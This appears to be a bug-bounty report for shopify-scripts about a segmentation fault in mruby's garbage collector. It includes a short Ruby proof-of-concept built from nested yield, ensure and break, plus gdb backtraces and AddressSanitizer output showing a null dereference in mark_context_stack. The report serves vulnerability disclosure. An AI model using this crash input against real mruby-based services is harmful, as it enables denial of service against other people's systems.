Lucene search
Ston3H1:209937HistoryMar 01, 2017 - 9:59 p.m.
shopify-scripts: SIGSEGV - mark_context_stack
2017-03-0121:59:51
ston3
hackerone.com
12
PoC
The following code triggers the bug (attached as test_mark_context_stack.rb):
def one
too{yield}end
def too
yield
ensure
one{break}end
one
Debug - mirb
Starting program: /home/x/Desktop/test/mruby/bin/mirb test_mark_context_stack
mirb - Embeddable Interactive Ruby Shell
=> :one
=> :too
Program received signal SIGSEGV, Segmentation fault.
0x0000000000435a7e in mark_context_stack (mrb=0x6af010, c=0x6bb530) at /home/x/Desktop/test/mruby/src/gc.c:554
554 if (mrb_basic_ptr(v)->tt == MRB_TT_FREE) {
(gdb) l
549 if (c->stbase + e > c->stend) e = c->stend - c->stbase;
550 for (i=0; i<e; i++) {
551 mrb_value v = c->stbase[i];
552
553 if (!mrb_immediate_p(v)) {
554 if (mrb_basic_ptr(v)->tt == MRB_TT_FREE) {
555 c->stbase[i] = mrb_nil_value();
556 }
557 else {
558 mrb_gc_mark(mrb, mrb_basic_ptr(v));
(gdb) info reg
rax 0x0 0
rbx 0x737280 7565952
rcx 0x6af0e8 7008488
rdx 0x6fe0f0 7332080
rsi 0x6b67b0 7038896
rdi 0x6af010 7008272
rbp 0x7ffffff97db0 0x7ffffff97db0
rsp 0x7ffffff97d70 0x7ffffff97d70
r8 0x0 0
r9 0x423125 4337957
r10 0x0 0
r11 0x0 0
r12 0x3 3
r13 0x3 3
r14 0x0 0
r15 0x0 0
rip 0x435a7e 0x435a7e <mark_context_stack+201>
eflags 0x10212 [ AF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
Backtrace - mirb
(gdb) bt
#0 0x0000000000435a7e in mark_context_stack (mrb=0x6af010, c=0x6bb530) at /home/x/Desktop/test/mruby/src/gc.c:554
#1 0x000000000043694b in final_marking_phase (mrb=0x6af010, gc=0x6af0e8) at /home/x/Desktop/test/mruby/src/gc.c:991
#2 0x0000000000436d5d in incremental_gc (mrb=0x6af010, gc=0x6af0e8, limit=2000)
at /home/x/Desktop/test/mruby/src/gc.c:1089
#3 0x0000000000436e57 in incremental_gc_step (mrb=0x6af010, gc=0x6af0e8)
at /home/x/Desktop/test/mruby/src/gc.c:1121
#4 0x0000000000436ffd in mrb_incremental_gc (mrb=0x6af010) at /home/x/Desktop/test/mruby/src/gc.c:1165
#5 0x0000000000435884 in mrb_obj_alloc (mrb=0x6af010, ttype=MRB_TT_PROC, cls=0x6bb370)
at /home/x/Desktop/test/mruby/src/gc.c:507
#6 0x00000000004142b8 in mrb_proc_new (mrb=0x6af010, irep=0x7236e0) at /home/x/Desktop/test/mruby/src/proc.c:22
#7 0x000000000041449d in mrb_closure_new (mrb=0x6af010, irep=0x7236e0) at /home/x/Desktop/test/mruby/src/proc.c:69
#8 0x000000000040f70a in mrb_vm_exec (mrb=0x6af010, proc=0x6b1fe0, pc=0x71d598)
at /home/x/Desktop/test/mruby/src/vm.c:2354
#9 0x0000000000408395 in mrb_vm_run (mrb=0x6af010, proc=0x744040, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#10 0x0000000000410593 in mrb_run (mrb=0x6af010, proc=0x744040, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#11 0x0000000000406a63 in ecall (mrb=0x6af010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#12 0x000000000040c23a in mrb_vm_exec (mrb=0x6af010, proc=0x744100, pc=0x72d774)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#13 0x0000000000408395 in mrb_vm_run (mrb=0x6af010, proc=0x744160, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#14 0x0000000000410593 in mrb_run (mrb=0x6af010, proc=0x744160, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#15 0x0000000000406a63 in ecall (mrb=0x6af010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#16 0x000000000040c23a in mrb_vm_exec (mrb=0x6af010, proc=0x744220, pc=0x72d774)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#17 0x0000000000408395 in mrb_vm_run (mrb=0x6af010, proc=0x744280, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#18 0x0000000000410593 in mrb_run (mrb=0x6af010, proc=0x744280, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#19 0x0000000000406a63 in ecall (mrb=0x6af010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#20 0x000000000040c23a in mrb_vm_exec (mrb=0x6af010, proc=0x744340, pc=0x72d774)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#21 0x0000000000408395 in mrb_vm_run (mrb=0x6af010, proc=0x7443a0, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#22 0x0000000000410593 in mrb_run (mrb=0x6af010, proc=0x7443a0, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#23 0x0000000000406a63 in ecall (mrb=0x6af010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#24 0x000000000040c23a in mrb_vm_exec (mrb=0x6af010, proc=0x744460, pc=0x72d774)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#25 0x0000000000408395 in mrb_vm_run (mrb=0x6af010, proc=0x7444c0, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#26 0x0000000000410593 in mrb_run (mrb=0x6af010, proc=0x7444c0, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#27 0x0000000000406a63 in ecall (mrb=0x6af010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#28 0x000000000040c23a in mrb_vm_exec (mrb=0x6af010, proc=0x744580, pc=0x72d774)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#29 0x0000000000408395 in mrb_vm_run (mrb=0x6af010, proc=0x7445e0, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
---Type <return> to continue, or q <return> to quit---q
Clang - mirb
x@x:~/Desktop/test/clang/mruby/bin$ ASAN_SYMBOLIZER_PATH=//usr/lib/llvm-3.8/bin/llvm-symbolizer ./mirb test_mark_context_stack
mirb - Embeddable Interactive Ruby Shell
=> :one
=> :too
ASAN:DEADLYSIGNAL
=================================================================
==10022==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000532e2d bp 0x7fff0e4048b0 sp 0x7fff0e404860 T0)
#0 0x532e2c in mark_context_stack /home/x/Desktop/test/clang/mruby/src/gc.c:554:11
#1 0x532c43 in mark_context /home/x/Desktop/test/clang/mruby/src/gc.c:571:3
#2 0x5326ec in root_scan_phase /home/x/Desktop/test/clang/mruby/src/gc.c:873:3
#3 0x53231f in incremental_gc /home/x/Desktop/test/clang/mruby/src/gc.c:1080:5
#4 0x53177d in incremental_gc_step /home/x/Desktop/test/clang/mruby/src/gc.c:1121:15
#5 0x5313f0 in mrb_incremental_gc /home/x/Desktop/test/clang/mruby/src/gc.c:1165:5
...
#250 0x4fd70e in mrb_vm_exec /home/x/Desktop/test/clang/mruby/src/vm.c:1740:11
#251 0x4f98ce in mrb_vm_run /home/x/Desktop/test/clang/mruby/src/vm.c:815:10
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/x/Desktop/test/clang/mruby/src/gc.c:554:11 in mark_context_stack
==10022==ABORTING
Debug - mruby
Reading symbols from ./mruby...done.
(gdb) r test_mark_context_stack
Starting program: /home/x/Desktop/test/mruby/bin/mruby test_mark_context_stack
Program received signal SIGSEGV, Segmentation fault.
0x0000000000432e05 in mark_context_stack (mrb=0x6ae010, c=0x6ba530) at /home/x/Desktop/test/mruby/src/gc.c:554
554 if (mrb_basic_ptr(v)->tt == MRB_TT_FREE) {
(gdb) l
549 if (c->stbase + e > c->stend) e = c->stend - c->stbase;
550 for (i=0; i<e; i++) {
551 mrb_value v = c->stbase[i];
552
553 if (!mrb_immediate_p(v)) {
554 if (mrb_basic_ptr(v)->tt == MRB_TT_FREE) {
555 c->stbase[i] = mrb_nil_value();
556 }
557 else {
558 mrb_gc_mark(mrb, mrb_basic_ptr(v));
(gdb) info reg
rax 0x0 0
rbx 0x734d30 7556400
rcx 0x6ae0e8 7004392
rdx 0x6fd180 7328128
rsi 0x6b57b0 7034800
rdi 0x6ae010 7004176
rbp 0x7ffffff98e90 0x7ffffff98e90
rsp 0x7ffffff98e50 0x7ffffff98e50
r8 0x0 0
r9 0x4204ac 4326572
r10 0x0 0
r11 0x0 0
r12 0x3 3
r13 0x3 3
r14 0x0 0
r15 0x0 0
rip 0x432e05 0x432e05 <mark_context_stack+201>
eflags 0x10212 [ AF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
Backtrace - mruby
(gdb) bt
#0 0x0000000000432e05 in mark_context_stack (mrb=0x6ae010, c=0x6ba530) at /home/x/Desktop/test/mruby/src/gc.c:554
#1 0x0000000000433cd2 in final_marking_phase (mrb=0x6ae010, gc=0x6ae0e8) at /home/x/Desktop/test/mruby/src/gc.c:991
#2 0x00000000004340e4 in incremental_gc (mrb=0x6ae010, gc=0x6ae0e8, limit=2000)
at /home/x/Desktop/test/mruby/src/gc.c:1089
#3 0x00000000004341de in incremental_gc_step (mrb=0x6ae010, gc=0x6ae0e8)
at /home/x/Desktop/test/mruby/src/gc.c:1121
#4 0x0000000000434384 in mrb_incremental_gc (mrb=0x6ae010) at /home/x/Desktop/test/mruby/src/gc.c:1165
#5 0x0000000000432c0b in mrb_obj_alloc (mrb=0x6ae010, ttype=MRB_TT_ENV, cls=0x0)
at /home/x/Desktop/test/mruby/src/gc.c:507
#6 0x0000000000414269 in env_new (mrb=0x6ae010, nlocals=2) at /home/x/Desktop/test/mruby/src/proc.c:42
#7 0x0000000000414335 in closure_setup (mrb=0x6ae010, p=0x741a40, nlocals=2)
at /home/x/Desktop/test/mruby/src/proc.c:57
#8 0x00000000004143c5 in mrb_closure_new (mrb=0x6ae010, irep=0x71d720) at /home/x/Desktop/test/mruby/src/proc.c:71
#9 0x0000000000409541 in mrb_vm_exec (mrb=0x6ae010, proc=0x6b0f80, pc=0x71c6b4)
at /home/x/Desktop/test/mruby/src/vm.c:1106
#10 0x000000000040828c in mrb_vm_run (mrb=0x6ae010, proc=0x741b60, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#11 0x000000000041048a in mrb_run (mrb=0x6ae010, proc=0x741b60, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#12 0x000000000040695a in ecall (mrb=0x6ae010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#13 0x000000000040c131 in mrb_vm_exec (mrb=0x6ae010, proc=0x741c20, pc=0x72a9f4)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#14 0x000000000040828c in mrb_vm_run (mrb=0x6ae010, proc=0x741c80, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#15 0x000000000041048a in mrb_run (mrb=0x6ae010, proc=0x741c80, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#16 0x000000000040695a in ecall (mrb=0x6ae010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#17 0x000000000040c131 in mrb_vm_exec (mrb=0x6ae010, proc=0x741d40, pc=0x72a9f4)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#18 0x000000000040828c in mrb_vm_run (mrb=0x6ae010, proc=0x741da0, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#19 0x000000000041048a in mrb_run (mrb=0x6ae010, proc=0x741da0, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#20 0x000000000040695a in ecall (mrb=0x6ae010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#21 0x000000000040c131 in mrb_vm_exec (mrb=0x6ae010, proc=0x741e60, pc=0x72a9f4)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#22 0x000000000040828c in mrb_vm_run (mrb=0x6ae010, proc=0x741ec0, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#23 0x000000000041048a in mrb_run (mrb=0x6ae010, proc=0x741ec0, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#24 0x000000000040695a in ecall (mrb=0x6ae010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#25 0x000000000040c131 in mrb_vm_exec (mrb=0x6ae010, proc=0x741f80, pc=0x72a9f4)
at /home/x/Desktop/test/mruby/src/vm.c:1740
#26 0x000000000040828c in mrb_vm_run (mrb=0x6ae010, proc=0x741fe0, self=..., stack_keep=2)
at /home/x/Desktop/test/mruby/src/vm.c:815
#27 0x000000000041048a in mrb_run (mrb=0x6ae010, proc=0x741fe0, self=...)
at /home/x/Desktop/test/mruby/src/vm.c:2562
#28 0x000000000040695a in ecall (mrb=0x6ae010, i=0) at /home/x/Desktop/test/mruby/src/vm.c:311
#29 0x000000000040c131 in mrb_vm_exec (mrb=0x6ae010, proc=0x7420a0, pc=0x72a9f4)
at /home/x/Desktop/test/mruby/src/vm.c:1740
---Type <return> to continue, or q <return> to quit---q
Clang - mruby
x@x:~/Desktop/test/clang/mruby/bin$ ASAN_SYMBOLIZER_PATH=//usr/lib/llvm-3.8/bin/llvm-symbolizer ./mruby test_mark_context_stack
ASAN:DEADLYSIGNAL
=================================================================
==31285==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000052f38d bp 0x7fff13b3f5e0 sp 0x7fff13b3f590 T0)
#0 0x52f38c in mark_context_stack /home/x/Desktop/test/clang/mruby/src/gc.c:554:11
#1 0x52f1a3 in mark_context /home/x/Desktop/test/clang/mruby/src/gc.c:571:3
#2 0x52ec4c in root_scan_phase /home/x/Desktop/test/clang/mruby/src/gc.c:873:3
#3 0x52e87f in incremental_gc /home/x/Desktop/test/clang/mruby/src/gc.c:1080:5
...
#250 0x4f94de in mrb_vm_run /home/x/Desktop/test/clang/mruby/src/vm.c:815:10
#251 0x4f8803 in mrb_run /home/x/Desktop/test/clang/mruby/src/vm.c:2562:12
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/x/Desktop/test/clang/mruby/src/gc.c:554:11 in mark_context_stack
==31285==ABORTING